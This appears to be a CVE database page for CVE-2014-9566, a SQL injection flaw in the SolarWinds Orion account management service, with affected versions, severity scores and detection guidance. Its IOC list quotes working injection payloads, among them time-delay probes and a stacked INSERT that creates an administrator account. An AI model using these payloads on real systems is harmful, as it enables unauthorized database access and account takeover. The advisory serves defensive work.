cbcvebase.
CVE-2014-9566
published 2015-03-10

CVE-2014-9566: Multiple SQL injection vulnerabilities in the Manage Accounts page in the AccountManagement.asmx service in the Solarwinds Orion Platform 2015.1, as used in…

PriorityP266high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
47.75%
98.7th percentile
Multiple SQL injection vulnerabilities in the Manage Accounts page in the AccountManagement.asmx service in the Solarwinds Orion Platform 2015.1, as used in Network Performance Monitor (NPM) before 11.5, NetFlow Traffic Analyzer (NTA) before 4.1, Network Configuration Manager (NCM) before 7.3.2, IP Address Manager (IPAM) before 4.3, User Device Tracker (UDT) before 3.2, VoIP & Network Quality Manager (VNQM) before 4.2, Server & Application Manager (SAM) before 6.2, Web Performance Monitor (WPM) before 2.2, and possibly other Solarwinds products, allow remote authenticated users to execute arbitrary SQL commands via the (1) dir or (2) sort parameter to the (a) GetAccounts or (b) GetAccountGroups endpoint.

Affected

8 ranges
VendorProductVersion rangeFixed in
solarwindsorion_ip_address_manager<= 4.2
solarwindsorion_netflow_traffic_analyzer<= 4.0
solarwindsorion_network_configuration_manager<= 7.3.1
solarwindsorion_network_performance_monitor<= 11.4
solarwindsorion_server_and_application_manager<= 6.1
solarwindsorion_user_device_tracker<= 3.1
solarwindsorion_voip_network_quality_manager<= 4.1
solarwindsorion_web_performance_monitor<= 2.1

Detection & IOCsextracted from sources · hover to see the quote

commandsort=Accounts.AccountID&dir=ASC; WAITFOR DELAY '0:0:5'--
commandsort=Accounts.AccountID&dir=ASC WAITFOR DELAY '0:0:5'--
commandsort=Accounts.AccountID&dir=ASC,(SELECT (CASE WHEN (5791=5791) THEN CHAR(65)+CHAR(83)+CHAR(67) ELSE 5791*(SELECT 5791 FROM master..sysdatabases) END))
commandsort=(SELECT (CASE WHEN (8998=8998) THEN CHAR(65)+CHAR(99)+CHAR(99)+CHAR(111)+CHAR(117)+CHAR(110)+CHAR(116)+CHAR(115)+CHAR(46)+CHAR(65)+CHAR(99)+CHAR(99)+CHAR(111)+CHAR(117)+CHAR(110)+CHAR(116)+CHAR(73)+CHAR(68) ELSE 8998*(SELECT 8998 FROM master..sysdatabases) END))&dir=ASC
commandsort=Accounts.AccountID; WAITFOR DELAY '0:0:5'--&dir=ASC
commandsort=Accounts.GroupPriority&dir=ASC; WAITFOR DELAY '0:0:5'--
commandsort=Accounts.GroupPriority&dir=ASC WAITFOR DELAY '0:0:5'--
commandsort=Accounts.GroupPriority; WAITFOR DELAY '0:0:5'--&dir=ASC
commandASC;insert into accounts values ('notadmin', '127-510823478-74417-8', '/+PA4Zck3arkLA7iwWIugnAEoq4ocRsYjF7lzgQWvJc+pepPz2a5z/L1Pz3c366Y/CasJIa7enKFDPJCWNiKRg==', 'Feb 1 2100 12:00AM', 'Y', 'notadmin', 1, '', '', 1, -1, 8, -1, 4, 0, 0, 0, 0, 0, 0, 'Y', 'Y', 'Y', 'Y', 'Y', '', '', 0, 0, 0, 'N', 'Y', '', 1, '', 0, '');
urlhttps://github.com/rapid7/metasploit-framework/pull/4836
  • Monitor HTTP GET requests to /AccountManagement.asmx targeting the GetAccounts or GetAccountGroups endpoints for SQL metacharacters (semicolons, WAITFOR, CASE/WHEN, CHAR()) in the 'sort' or 'dir' query parameters.
  • Alert on requests to AccountManagement.asmx authenticated with the Guest account (especially with a blank password), as the lack of ACL enforcement allows Guest-level exploitation of admin endpoints.
  • Detect stacked SQL injection attempts using WAITFOR DELAY patterns in HTTP query parameters targeting SolarWinds Orion web services.
  • Detect unauthorized INSERT INTO accounts SQL statements in database logs or WAF logs, particularly inserting new users with admin privileges and blank passwords.
  • Look for the Metasploit auxiliary module solarwinds_orion_sqli being used against the environment; it targets the GetAccounts endpoint for admin account creation via stacked SQL injection.
  • ·The SQL user used by the Orion application is not a database administrator and xp_cmdshell is unavailable, limiting post-exploitation OS-level command execution via this vector.
  • ·Trial installations deploy a local SQL Server Express instance; non-trial versions may use a remote SQL server, which could affect exploitation scope and lateral movement potential.

CVSS provenance

nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
osv5.5MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.